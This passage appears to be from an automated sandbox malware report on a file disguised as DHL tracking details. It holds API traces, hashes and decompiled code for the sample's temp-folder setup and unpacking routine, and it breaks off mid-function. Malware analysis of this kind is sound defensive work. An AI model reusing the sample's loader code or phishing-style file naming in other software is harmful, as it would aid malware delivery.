                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-896006169
                    • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                    • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 023807DD Relevance: 7.7, APIs: 5, Instructions: 180fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02380974
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8e4870336c8819dfd635fe3f329b0fc3c801201e30445c4982ce548472fb44e3
                    • Instruction ID: 7dfc3ff5c4e6c2be1fba3a8ef4446ba19ffed8f6a67757f3baf9d0e7bd3c7616
                    • Opcode Fuzzy Hash: 8e4870336c8819dfd635fe3f329b0fc3c801201e30445c4982ce548472fb44e3
                    • Instruction Fuzzy Hash: A9611B35E50348EBEB64EBE4E951BEEB7B6AF48710F204416E518EE2A0E7700E45DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                    0x004031f2
                    0x004031f8
                    0x004031fe
                    0x00403205
                    0x0040320a
                    0x00403212
                    0x0040321e
                    0x00403224
                    0x00403208
                    0x00403208
                    0x00403208

                    APIs
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                    • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Char$Next$CreateDirectoryPrev
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 4115351271-3512041753
                    • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                    • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                    • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                    • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                    Download Yara Rule
                    C-Code - Quality: 99%
                    			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
